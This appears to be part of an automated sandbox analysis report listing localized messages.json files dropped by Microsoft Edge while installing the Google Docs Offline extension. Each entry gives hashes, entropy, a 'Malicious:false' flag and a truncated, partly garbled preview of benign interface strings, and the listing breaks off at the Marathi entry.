                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1719
